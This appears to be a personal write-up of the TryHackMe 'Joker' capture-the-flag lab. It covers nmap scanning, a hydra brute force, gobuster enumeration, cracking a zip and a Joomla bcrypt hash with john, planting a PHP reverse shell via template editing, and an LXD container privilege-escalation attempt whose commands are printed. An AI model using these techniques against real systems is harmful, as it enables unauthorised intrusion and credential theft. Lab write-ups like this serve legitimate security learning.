THM Joker CTF
Reconnaissance:
nmap -sV -sC -v 10.66.134.131
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
3072 d4:ef:11:97:3a:99:0c:ae:08:92:ab:e7:34:a3:9d:25 (RSA)
256 a5:18:e5:4d:9f:31:2d:6a:3b:e8:a8:c9:66:b5:b9:0e (ECDSA)
|_ 256 73:6e:c1:2b:89:38:d2:d0:06:84:86:8e:e1:f3:f5:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: HA: Joker
8080/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
http-auth:
HTTP/1.1 401 Unauthorized0D
|_ Basic realm=Please enter the password.
|_http-title: 401 Unauthorized
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
At 80 we get a website with images of the joker and at 8080 a login prompt
We look at secret.txt and we find a conversation between batman joker.
Tried hydra with joker as a login user with
hydra -l joker -P /usr/share/wordlists/rockyou.txt -f 10.66.134.131 -s 8080 http-get
[8080][http-get] host: 10.66.134.131 login: joker password: hannah
#Enumerate the new location with credentials
gobuster dir -u http://joker.thm:8080/ -w /usr/share/wordlists/dirb/common.txt -t 20 -U joker -P hannah
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/administrator (Status: 301) [Size: 321] [--> http://joker.thm:8080/administrator/]
/bin (Status: 301) [Size: 311] [--> http://joker.thm:8080/bin/]
/cache (Status: 301) [Size: 313] [--> http://joker.thm:8080/cache/]
/backup (Status: 200) [Size: 12133560]
/components (Status: 301) [Size: 318] [--> http://joker.thm:8080/components/]
/images (Status: 301) [Size: 314] [--> http://joker.thm:8080/images/]
/includes (Status: 301) [Size: 316] [--> http://joker.thm:8080/includes/]
/index.php (Status: 200) [Size: 10937]
/language (Status: 301) [Size: 316] [--> http://joker.thm:8080/language/]
/layouts (Status: 301) [Size: 315] [--> http://joker.thm:8080/layouts/]
/libraries (Status: 301) [Size: 317] [--> http://joker.thm:8080/libraries/]
/LICENSE (Status: 200) [Size: 18092]
/media (Status: 301) [Size: 313] [--> http://joker.thm:8080/media/]
/modules (Status: 301) [Size: 315] [--> http://joker.thm:8080/modules/]
/plugins (Status: 301) [Size: 315] [--> http://joker.thm:8080/plugins/]
/README (Status: 200) [Size: 4494]
/robots.txt (Status: 200) [Size: 836]
/robots (Status: 200) [Size: 836]
/server-status (Status: 403) [Size: 276]
/templates (Status: 301) [Size: 317] [--> http://joker.thm:8080/templates/]
/tmp (Status: 301) [Size: 311] [--> http://joker.thm:8080/tmp/]
/web.config (Status: 200) [Size: 1690]
Exploitation:
Checked out /backup and it download backup.zip
Its password protected by the same password as earlier as i found out running.
zip2john > hash
john hash –wordlist=/usr/share/wordlist/rockyou.txt
Password: hannah
unzip backup.zip
We check the db and find the “Super Duper User”
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com',
'$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
And heres what cc1gr_users object is composed of:
CREATE TABLE `cc1gr_users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`username` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`password` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`block` tinyint(4) NOT NULL DEFAULT '0',
`sendEmail` tinyint(4) DEFAULT '0',
`registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`activation` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`params` text COLLATE utf8mb4_unicode_ci NOT NULL,
`lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
`resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime',
`otpKey` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
`otep` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
`requireReset` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Require user to reset password on next login',
PRIMARY KEY (`id`),
KEY `idx_name` (`name`(100)),
KEY `idx_block` (`block`),
KEY `username` (`username`),
KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=548 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
So we take the password and make it into a file to crack it
echo ‘$2y10b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG’ > crock.txt
john crock.txt
We get
Proceeding with wordlist:/usr/share/john/password.lst
abcd1234 (?)
Now we log into joomla with our credentials admin:abcd1234
In the extension/template section we can change the code of our index.php. We add a full reverse shell from pentestmonkey.
Slap that into our existing index.php and we click on Template preview at the top to have it execute our code
We get a shell on our nc listener. Our id lets us know that we have group permission on lxd which can be used to pop shell we find the code on GTFObins.
lxc init ubuntu:16.04 x -c security.privileged=true
lxc config device add x x disk source=/ path=/mnt/ recursive=true
lxc start x
lxc exec x /bin/sh
Notes:
We are getting errors that our Home directory isn’t set
Checked other peoples writeups on this and it turns out there might be a bug. We are supposed to be able to use lxd to create and environement we can fully control. We keep getting the error message:
Sorry, home directories outside of /home needs configuration.
See https://forum.snapcraft.io/t/11209 for details.
We would need to either have sudo access to be able to modify www-data /home folder. But if we had those privileges we wouldn’t need lxd’s help to escalate our privileges. Heres a article explaining lxd privilege escalation https://www.hackingarticles.in/lxd-privilege-escalation/
I’ve also used all credentials found to try and login using a different user
Default credentials do not work either and we have no access to /etc/shadow. This is enough for all answers except the name of the root flag file.
Bummer.
Tools:
Nmap is the gold standard for port scanning tools.
John the ripper another password/hash cracking tool that does just about everything from Unix passwords, DB server passwords, private keys, archives passwords and passworded document files. For clarification sake, zip2john is part of the john package.
Hydra is a powerful password/hash cracking tool.
pentestmonkey great php reverse shell.